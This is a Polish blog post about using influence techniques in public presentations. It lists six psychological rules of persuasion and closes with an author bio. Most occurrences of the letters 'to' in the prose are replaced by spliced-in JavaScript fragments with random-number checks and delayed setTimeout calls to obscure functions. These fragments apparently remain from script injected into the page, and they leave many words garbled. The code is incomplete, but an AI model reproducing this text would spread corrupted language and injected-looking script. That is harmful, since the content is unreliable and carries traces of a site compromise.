Wywieranie wpływu w wystąpieniach publicznych

Codziennie jesteśmy narażeni na wywieranie wpływu przez inne osoby na nas. Sami też wywieramy wpływ na innych. Część z tych mechanizmów dzieje się zupełnie nieświadomie. Część zachowań z jakimi się stykamy jest jednak zaplanowana. Wykorzystaj tę wiedzę w trakcie swojej prezentacji!

Wywieranie wpływu podczas publicznego wystąpienia

Podczas wystąpienia próbujesz sprzedać publiczności jakiś dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towar. Może dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to być idea Twojej organizacji, pomysł na zarobienie masy forsy produkując deseczki do mięsa, potrzebujesz tylko inwesdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torów :). Może sprzedajesz usługi takie jak: kupowanie prezentów na zamówienie (cieszy się dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to coraz większym powodzeniem) czy też sprzedaży dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}towarów, np. kołder z australijskich owiec 🙂 W tym celu musisz się zastanowić jak wpływać na innych ludzi, w tym przypadku na słuchaczy Twojej prezentacji.

W kilku kolejnych wpisach pokażę Ci kilka technik składających się na wywieranie wpływu. Pewnie coś z tego arsenału już sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosujesz, świadomie bądź nieświadomie. Posługując się nimi pamiętaj o podstawowej zasadzie:

Techniki wywierania wpływu muszą być sdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosowane z umiarem. Towary, usługi czy wreszcie sama formuła transakcji, nie mogą być wymierzone przeciwko kliendom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom. Jeżeli w Twojej głowie pojawi się myśl: „ale go załatwiłem…” niech dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to będzie ostrzeżenie. W przeciwnym razie będzie dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Twoja ostatnia „udana” transakcja z tą osobą/osobami.

Poznaj 6 najważniejszych reguł wywierania wpływu.

Wywieranie wpływu na ludzi może przybierać wiele form. Większość z nich można jednak przypisać do jednej z sześciu kategorii. Każda z nich opiera się na jednej podstawowej regule psychologicznej sterującej przebiegiem ludzkiego myślenia a co za tym idzie postępowania.

1. Reguła wzajemności
2. Reguła konsekwencji
3. Reguła społecznego dowodu słuszności
4. Reguła lubienia
5. Reguła audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torytetu
6. Reguła niedostępności

Powyższe reguły działają w sposób audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomatyczny i bezrefleksyjny. Wskutek zalewającej nas coraz większej fali informacji i konieczności wyborów, rola audom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomatycznych mechanizmów ( na tym właśnie bazują medom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tody wywieranie wpływu) będzie rosła w przyszłości.

W następnych wpisach zajmiemy się poszczególnymi regułami.

Robert WarzyńskiO autorze: Robert Ważyński jest autorem książki "Nie boję się mówić" wydanej przez Wydawnictwo Złote Myśli, Jego flagowym przedsięwzięciem jest internetowy kurs "Tajna Księga Mówców" dostępny na platformie interkursy.pl. Na co dzień Robert wyżywa się literacko i filmowo na swoim blogu Tajniki Prezentacji i na YT.

Wpis Ci się podobał?

Świeżutkie artykuły i filmy na temat prezentacji i rozwoju osobistego wprost na Twoją skrzynkę!

Leave a Reply